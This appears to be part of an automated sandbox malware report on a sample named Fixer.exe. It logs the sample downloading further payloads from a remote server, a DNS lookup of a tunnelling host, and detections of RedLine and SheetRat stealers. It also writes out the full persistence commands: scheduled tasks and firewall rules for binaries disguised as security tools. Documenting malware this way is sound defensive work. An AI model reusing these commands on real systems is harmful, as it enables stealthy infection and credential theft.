                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046046972 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046058893 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046168089 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046264887 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046288013 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046330929 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046456099 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046499968 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046519995 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046636105 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046679974 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046793938 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046865940 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046868086 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046979904 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.046984911 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047033072 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047156096 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047200918 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047220945 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047338963 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047358036 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047475100 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047570944 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047573090 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047683001 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047688961 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047806025 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047811031 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047893047 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.047925949 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048022032 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048041105 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048137903 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048155069 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048271894 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048305988 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048373938 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048417091 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048489094 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048533916 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048645020 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048701048 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048743963 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048779964 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048855066 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048899889 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.048995018 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049009085 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049060106 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049128056 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049202919 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049209118 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049319983 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049329996 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049401999 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049449921 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049541950 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049565077 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049681902 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049700975 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049762964 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049817085 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049873114 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049932957 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.049997091 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.050029039 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.050179958 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.309398890 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.309698105 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.314785957 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.315001011 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323183060 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323292971 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323375940 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323496103 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323509932 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323626041 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.323709011 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.367178917 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592348099 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592453003 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592514038 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592628956 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592678070 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592780113 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592858076 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592892885 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.592982054 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593095064 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593130112 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593250990 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593329906 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593343973 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593455076 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593561888 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593564987 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593672037 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593806982 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593838930 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593955994 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.593976021 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594082117 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594149113 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594240904 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594274044 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594386101 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594475985 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594500065 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594624043 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594670057 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594733953 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594850063 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594911098 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.594966888 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595138073 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595158100 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595201969 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595330000 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595434904 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595434904 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595546007 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595603943 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595716953 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595787048 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595902920 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.595953941 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596016884 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596120119 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596134901 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596189022 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596298933 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596373081 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.596482992 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.869509935 CET19114974989.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.913985014 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:41.963009119 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.273185968 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.273237944 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.273535013 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.544094086 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.556463957 CET11124974889.23.97.121192.168.11.20
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.591567993 CET497491911192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:24:42.591842890 CET497481112192.168.11.2089.23.97.121
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.906179905 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:11.907445908 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:13.922643900 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:17.937359095 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:25.951253891 CET4975061069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:32.169341087 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:33.184020042 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:35.199263096 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:39.214046001 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:47.227816105 CET4975161069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:53.446026087 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:54.460692883 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:56.475889921 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:00.490591049 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:08.504399061 CET4975261069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:14.722490072 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:15.737260103 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:17.752438068 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              Jan 8, 2025 11:26:21.767132998 CET4975361069192.168.11.20147.185.221.24
                                                                                                                                                                                                                                              TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.305643082 CET5720253192.168.11.201.1.1.1
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.903944016 CET53572021.1.1.1192.168.11.20
                                                                                                                                                                                                                                              TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                                                                                                              Jan 8, 2025 11:25:10.305643082 CET192.168.11.201.1.1.10x7750Standard query (0)et-seattle.gl.at.ply.ggA (IP address)IN (0x0001)false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Jan 8, 2025 11:25:10.903944016 CET | 1.1.1.1 | 192.168.11.20 | 0x7750 | No error (0) | et-seattle.gl.at.ply.gg | | 147.185.221.24 | A (IP address) | IN (0x0001) | false
                                                                                                                                                                                                                                              • 89.23.97.121:1911
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.11.20 | 49749 | 89.23.97.121 | 1911 | 7492 | C:\Users\user\Desktop\Fixer.exe
Timestamp | Bytes transferred | Direction | Data
Jan 8, 2025 11:24:38.380534887 CET | 87 | OUT | GET /6z9uno0baqvej0me.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 89.23.97.121:1911
                                                                                                                                                                                                                                              Connection: Keep-Alive
Jan 8, 2025 11:24:38.661952019 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                              Date: Wed, 08 Jan 2025 10:24:38 GMT
Jan 8, 2025 11:24:40.480566025 CET | 58 | OUT | GET /FixerNerest.exe HTTP/1.1
                                                                                                                                                                                                                                              Host: 89.23.97.121:1911
Jan 8, 2025 11:24:40.759393930 CET | 1289 | IN | HTTP/1.1 200 OK
                                                                                                                                                                                                                                              Transfer-Encoding: chunked
                                                                                                                                                                                                                                              Server: Microsoft-HTTPAPI/2.0
                                                                                                                                                                                                                                              Date: Wed, 08 Jan 2025 10:24:40 GMT


                                                                                                                                                                                                                                              Target ID:0
                                                                                                                                                                                                                                              Start time:05:24:16
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\Desktop\Fixer.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):true
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\Desktop\Fixer.exe"
                                                                                                                                                                                                                                              Imagebase:0x670000
                                                                                                                                                                                                                                              File size:307'712 bytes
                                                                                                                                                                                                                                              MD5 hash:2ACDA1F917022E9E8081AD69B15330C6
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.52600457326.0000000002C36000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000000.52343849796.0000000000672000.00000002.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.52600457326.0000000002E87000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:2
                                                                                                                                                                                                                                              Start time:05:24:39
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\6z9uno0baqvej0me.exe"
                                                                                                                                                                                                                                              Imagebase:0x280000
                                                                                                                                                                                                                                              File size:471'107 bytes
                                                                                                                                                                                                                                              MD5 hash:2E2BF344AC14353A679CCDD682273BE0
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Yara matches:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_SheetRat, Description: Yara detected SheetRat, Source: 00000002.00000002.52853780716.00000000127E1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Avira
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:3
                                                                                                                                                                                                                                              Start time:05:24:41
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Users\user\AppData\Local\Temp\FixerNerest.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"C:\Users\user\AppData\Local\Temp\FixerNerest.exe"
                                                                                                                                                                                                                                              Imagebase:0x5f0000
                                                                                                                                                                                                                                              File size:398'579 bytes
                                                                                                                                                                                                                                              MD5 hash:094EBE271C9334745C238FC2BA77FD38
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Antivirus matches:
                                                                                                                                                                                                                                              • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                                                              Reputation:low
                                                                                                                                                                                                                                              Has exited:true

                                                                                                                                                                                                                                              Target ID:4
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                                                                                                                              Imagebase:0x7ff64dca0000
                                                                                                                                                                                                                                              File size:496'640 bytes
                                                                                                                                                                                                                                              MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:false
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

                                                                                                                                                                                                                                              Target ID:5
                                                                                                                                                                                                                                              Start time:05:25:04
                                                                                                                                                                                                                                              Start date:08/01/2025
                                                                                                                                                                                                                                              Path:C:\Windows\System32\cmd.exe
                                                                                                                                                                                                                                              Wow64 process (32bit):false
                                                                                                                                                                                                                                              Commandline:"CMD" netsh advfirewall firewall add rule name="7=PG%XL(%PSA%R" dir=in action=allow program="C:\Windows\System32\xdwdSecurityHealthSystrays.exe" enable=yes & exit
                                                                                                                                                                                                                                              Imagebase:0x7ff6fd8a0000
                                                                                                                                                                                                                                              File size:289'792 bytes
                                                                                                                                                                                                                                              MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                                                                                                                                                                                                                              Has elevated privileges:true
                                                                                                                                                                                                                                              Has administrator privileges:true
                                                                                                                                                                                                                                              Programmed in:C, C++ or other language
                                                                                                                                                                                                                                              Reputation:high
                                                                                                                                                                                                                                              Has exited:false

Target ID:6
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff771540000
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:false

Target ID:7
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
Imagebase:0x7ff6fd8a0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:8
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff789eb0000
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:9
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /f /sc minute /mo 1 /tn "Microsoft\Windows\SecurityHealthSystray12" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
Imagebase:0x7ff679410000
File size:235'008 bytes
MD5 hash:796B784E98008854C27F4B18D287BA30
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:10
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"cmd" /c schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST & exit
Imagebase:0x7ff6fd8a0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:11
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\conhost.exe
Wow64 process (32bit):false
Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:0x7ff771540000
File size:875'008 bytes
MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:high
Has exited:true

Target ID:12
Start time:05:25:04
Start date:08/01/2025
Path:C:\Windows\System32\schtasks.exe
Wow64 process (32bit):false
Commandline:schtasks /create /f /sc minute /mo 30 /tn "Microsoft\Windows\Schost" /tr "C:\Windows\System32\xdwdSecurityHealthSystrays.exe" /RL HIGHEST
Imagebase:0x7ff679410000
File size:235'008 bytes
MD5 hash:796B784E98008854C27F4B18D287BA30
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Reputation:moderate
Has exited:true

Target ID:13
Start time:05:25:05
Start date:08/01/2025
Path:C:\Windows\System32\xdwdSecurityHealthSystrays.exe
Wow64 process (32bit):false
Commandline:"C:\Windows\System32\xdwdSecurityHealthSystrays.exe"
Imagebase:0x430000
File size:735'522'883 bytes
MD5 hash:0AC0B9DEA199D2DF1593CAB96613CB52
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
Antivirus matches:
• Detection: 100%, Avira
Has exited:true

Target ID:14
Start time:05:25:05
Start date:08/01/2025
Path:C:\Windows\System32\cmd.exe
Wow64 process (32bit):false
Commandline:"CMD" netsh advfirewall firewall add rule name=",%MUc}<NcMKXc_" dir=in action=allow program="C:\Windows\System32\Defender.exe" enable=yes & exit
Imagebase:0x7ff6fd8a0000
File size:289'792 bytes
MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:true
Has administrator privileges:true
Programmed in:C, C++ or other language
